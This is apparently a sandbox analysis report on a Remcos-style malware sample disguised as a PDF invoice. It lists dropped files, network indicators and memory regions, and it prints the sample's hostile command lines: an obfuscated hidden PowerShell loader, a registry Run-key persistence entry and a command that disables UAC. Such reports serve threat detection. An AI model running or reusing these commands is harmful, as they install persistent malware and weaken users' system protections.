Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Vyuctovani_2024_07-1206812497#U00b7pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xfaa00507, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dhlzlon.3k4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j30psqis.40m.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\avtrjqntogc
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\bhvCBB3.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Nyde.Hal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Peripatecically200.par
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\blokkryptografimetoderne.une
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\bundgrnsens.tan
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\handelskamrene.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\huse.got
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\rognfiskenes.sid
|
data
|
dropped
|
||
|
C:\Users\user\Music\veterinarians.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
|
"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe
|
"C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ
/d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism%
($Eftertaklede)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle
minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD
/d 0 /f
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe
|
C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe
|
C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nubilum.exe
|
C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gp(
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://drive.google.com/x
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpt
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://geoplugin.net/json.gp&-
|
unknown
|
||
|
http://www.imvu.comppData
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpB
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpV
|
unknown
|
||
|
http://geoplugin.net/3
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 28 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
217.76.50.73
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
drive.google.com
|
142.250.186.174
|
||
|
drive.usercontent.google.com
|
142.250.186.161
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
217.76.50.73
|
a458386d9.duckdns.org
|
Sweden
|
|
|
|
142.250.186.161
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.186.174
|
drive.google.com
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
|
EnableLUA
|
|
|
|
HKEY_CURRENT_USER\Pauropod\wohlerite
|
Gigelira57
|
||
|
HKEY_CURRENT_USER\varmefordelingers\Uninstall\bilder
|
echinite
|
||
|
HKEY_CURRENT_USER\Bukkespringenes
|
Hovedstads
|
||
|
HKEY_CURRENT_USER\Environment
|
tomboyism
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-7CSH4D
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
husmndenes
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
27FA000
|
heap
|
page read and write
|
|
|
|
8EC4000
|
direct allocation
|
page execute and read and write
|
|
|
|
2821000
|
heap
|
page read and write
|
|
|
|
281E000
|
heap
|
page read and write
|
|
|
|
280F000
|
heap
|
page read and write
|
|
|
|
2821000
|
heap
|
page read and write
|
|
|
|
1BE4000
|
remote allocation
|
page execute and read and write
|
|
|
|
281E000
|
heap
|
page read and write
|
|
|
|
2CE92043000
|
heap
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
AEA000
|
heap
|
page read and write
|
||
|
2882000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2CE97470000
|
trusted library allocation
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
49A1000
|
trusted library allocation
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
50CA000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8B8000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page execute and read and write
|
||
|
6C90000
|
direct allocation
|
page read and write
|
||
|
B8F000
|
stack
|
page read and write
|
||
|
22B5000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
2317000
|
heap
|
page read and write
|
||
|
1E8D0000
|
heap
|
page read and write
|
||
|
22D5000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
2CE92079000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
1F602000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2CE92000000
|
heap
|
page read and write
|
||
|
2CE9208F000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
2CE976E8000
|
heap
|
page read and write
|
||
|
7194000
|
heap
|
page read and write
|
||
|
EF97F9B000
|
stack
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
50A0000
|
trusted library allocation
|
page read and write
|
||
|
2347000
|
heap
|
page read and write
|
||
|
666000
|
heap
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
2CE97810000
|
trusted library allocation
|
page read and write
|
||
|
90F000
|
stack
|
page read and write
|
||
|
4890000
|
heap
|
page readonly
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
71F3000
|
heap
|
page read and write
|
||
|
22BD000
|
heap
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
22E4000
|
heap
|
page read and write
|
||
|
2886000
|
heap
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
2CE92902000
|
heap
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
22B4000
|
heap
|
page read and write
|
||
|
1F577000
|
heap
|
page read and write
|
||
|
6B6E000
|
stack
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
2C0C000
|
heap
|
page read and write
|
||
|
2CE974F0000
|
trusted library allocation
|
page read and write
|
||
|
2888000
|
heap
|
page read and write
|
||
|
26B1000
|
heap
|
page read and write
|
||
|
2871000
|
heap
|
page read and write
|
||
|
6AA0000
|
heap
|
page execute and read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page execute and read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
1F075000
|
heap
|
page read and write
|
||
|
2D1E000
|
stack
|
page read and write
|
||
|
6C60000
|
direct allocation
|
page read and write
|
||
|
A9E000
|
stack
|
page read and write
|
||
|
27A2000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
2CE976CA000
|
heap
|
page read and write
|
||
|
50B2000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
841D000
|
stack
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
49FF000
|
trusted library allocation
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2CE97660000
|
trusted library allocation
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
808000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2884000
|
heap
|
page read and write
|
||
|
EF9897E000
|
stack
|
page readonly
|
||
|
2CE97AE0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1F5E6000
|
heap
|
page read and write
|
||
|
EF9887E000
|
unkown
|
page readonly
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
44E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
1EDEF000
|
stack
|
page read and write
|
||
|
2CE97B70000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
84B6000
|
heap
|
page read and write
|
||
|
2CE93020000
|
trusted library allocation
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
849A000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2748000
|
stack
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
2CE97501000
|
trusted library allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
22D4000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2CE91F40000
|
heap
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
2CE92041000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
236E000
|
stack
|
page read and write
|
||
|
288B000
|
heap
|
page read and write
|
||
|
2CE97650000
|
trusted library allocation
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
69DC000
|
stack
|
page read and write
|
||
|
1F48E000
|
heap
|
page read and write
|
||
|
19E000
|
stack
|
page read and write
|
||
|
2353000
|
heap
|
page read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
713D000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2CE976FE000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
9CD000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
22D5000
|
heap
|
page read and write
|
||
|
4290000
|
direct allocation
|
page read and write
|
||
|
2312000
|
heap
|
page read and write
|
||
|
EF9A0FE000
|
stack
|
page read and write
|
||
|
22D3000
|
heap
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
6C70000
|
direct allocation
|
page read and write
|
||
|
2ABF000
|
stack
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
81D000
|
unkown
|
page readonly
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
2CE920B4000
|
heap
|
page read and write
|
||
|
1F5BF000
|
heap
|
page read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
2CE97540000
|
trusted library allocation
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
1EF6D000
|
stack
|
page read and write
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
286B000
|
heap
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
44D0000
|
trusted library allocation
|
page read and write
|
||
|
2822000
|
heap
|
page read and write
|
||
|
22DC000
|
heap
|
page read and write
|
||
|
6CD0000
|
direct allocation
|
page read and write
|
||
|
2879000
|
heap
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
4512000
|
trusted library allocation
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
2CE920A2000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
2CE9761F000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
22BB000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
2590000
|
heap
|
page read and write
|
||
|
2C8B000
|
heap
|
page read and write
|
||
|
2873000
|
heap
|
page read and write
|
||
|
2CE97600000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
42A0000
|
direct allocation
|
page read and write
|
||
|
1F48E000
|
heap
|
page read and write
|
||
|
2C4F000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
22C8000
|
heap
|
page read and write
|
||
|
5A09000
|
trusted library allocation
|
page read and write
|
||
|
1AA0000
|
remote allocation
|
page execute and read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1F58A000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
2FCE000
|
unkown
|
page read and write
|
||
|
2630000
|
heap
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
4510000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
1E040000
|
heap
|
page read and write
|
||
|
2600000
|
direct allocation
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
22CD000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
2ABF000
|
stack
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
2CE97530000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
4280000
|
direct allocation
|
page read and write
|
||
|
5061000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
2CE92129000
|
heap
|
page read and write
|
||
|
2770000
|
direct allocation
|
page read and write
|
||
|
EF982FE000
|
stack
|
page read and write
|
||
|
2353000
|
heap
|
page read and write
|
||
|
2874000
|
heap
|
page read and write
|
||
|
22B9000
|
heap
|
page read and write
|
||
|
22B9000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
2CE97544000
|
trusted library allocation
|
page read and write
|
||
|
1F5F4000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
1E530000
|
direct allocation
|
page read and write
|
||
|
6F8E000
|
stack
|
page read and write
|
||
|
2BD0000
|
trusted library section
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
22B1000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
22F5000
|
heap
|
page read and write
|
||
|
712D000
|
heap
|
page read and write
|
||
|
1F615000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
1F5EC000
|
heap
|
page read and write
|
||
|
2CE92913000
|
heap
|
page read and write
|
||
|
EF98D79000
|
stack
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
1F369000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
77C000
|
unkown
|
page read and write
|
||
|
2CE92B90000
|
trusted library allocation
|
page read and write
|
||
|
2730000
|
direct allocation
|
page read and write
|
||
|
701C0000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
664000
|
heap
|
page read and write
|
||
|
22C6000
|
heap
|
page read and write
|
||
|
2CE92102000
|
heap
|
page read and write
|
||
|
22D5000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
AE9000
|
heap
|
page read and write
|
||
|
338E000
|
unkown
|
page read and write
|
||
|
1F58A000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
5054000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
27C1000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
22C8000
|
heap
|
page read and write
|
||
|
7178000
|
heap
|
page read and write
|
||
|
7F7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
2888000
|
heap
|
page read and write
|
||
|
1EA6E000
|
stack
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
44F9000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
44C0000
|
trusted library section
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
22C6000
|
heap
|
page read and write
|
||
|
22C5000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
50B5000
|
trusted library allocation
|
page read and write
|
||
|
1F5D2000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
22CE000
|
heap
|
page read and write
|
||
|
7DD000
|
unkown
|
page readonly
|
||
|
7AD000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
1F681000
|
heap
|
page read and write
|
||
|
1F5CA000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
27CF000
|
heap
|
page read and write
|
||
|
22BC000
|
heap
|
page read and write
|
||
|
22BF000
|
heap
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
1FAB0000
|
direct allocation
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
22C1000
|
heap
|
page read and write
|
||
|
22B0000
|
heap
|
page read and write
|
||
|
2CE92E40000
|
trusted library allocation
|
page read and write
|
||
|
2CE976F5000
|
heap
|
page read and write
|
||
|
930000
|
heap
|
page read and write
|
||
|
22B9000
|
heap
|
page read and write
|
||
|
4250000
|
direct allocation
|
page read and write
|
||
|
2CE97810000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
1F588000
|
heap
|
page read and write
|
||
|
2CE9764F000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
720E000
|
heap
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
761B000
|
stack
|
page read and write
|
||
|
1F2F0000
|
heap
|
page read and write
|
||
|
2CE920FF000
|
heap
|
page read and write
|
||
|
2CE978A0000
|
remote allocation
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
||
|
22D1000
|
heap
|
page read and write
|
||
|
1E550000
|
direct allocation
|
page read and write
|
||
|
278B000
|
heap
|
page read and write
|
||
|
1F45C000
|
heap
|
page read and write
|
||
|
1F5C2000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
2CE978A0000
|
remote allocation
|
page read and write
|
||
|
493E000
|
stack
|
page read and write
|
||
|
22D4000
|
heap
|
page read and write
|
||
|
6AEE000
|
stack
|
page read and write
|
||
|
1F608000
|
heap
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
1F06F000
|
stack
|
page read and write
|
||
|
7200000
|
heap
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
4880000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
4BE000
|
stack
|
page read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
5049000
|
trusted library allocation
|
page read and write
|
||
|
6C80000
|
direct allocation
|
page read and write
|
||
|
507E000
|
trusted library allocation
|
page read and write
|
||
|
6AA5000
|
heap
|
page execute and read and write
|
||
|
2CE97661000
|
heap
|
page read and write
|
||
|
1E850000
|
remote allocation
|
page read and write
|
||
|
4948000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
504C000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
1F5EC000
|
heap
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
1F4F0000
|
unclassified section
|
page execute and read and write
|
||
|
2CE920A0000
|
heap
|
page read and write
|
||
|
80F0000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1FA80000
|
unclassified section
|
page execute and read and write
|
||
|
22B0000
|
heap
|
page read and write
|
||
|
1EF2F000
|
stack
|
page read and write
|
||
|
2B46000
|
heap
|
page read and write
|
||
|
2278000
|
heap
|
page read and write
|
||
|
2335000
|
heap
|
page read and write
|
||
|
2CE92900000
|
heap
|
page read and write
|
||
|
2347000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2CE92106000
|
heap
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
2BBF000
|
stack
|
page read and write
|
||
|
2790000
|
heap
|
page read and write
|
||
|
1F614000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
31B2000
|
heap
|
page read and write
|
||
|
2CE9291A000
|
heap
|
page read and write
|
||
|
22E5000
|
heap
|
page read and write
|
||
|
2615000
|
heap
|
page read and write
|
||
|
22E6000
|
heap
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page read and write
|
||
|
22C1000
|
heap
|
page read and write
|
||
|
22DE000
|
heap
|
page read and write
|
||
|
287C000
|
heap
|
page read and write
|
||
|
EF9847E000
|
stack
|
page read and write
|
||
|
29BF000
|
stack
|
page read and write
|
||
|
2A7F000
|
stack
|
page read and write
|
||
|
17C000
|
stack
|
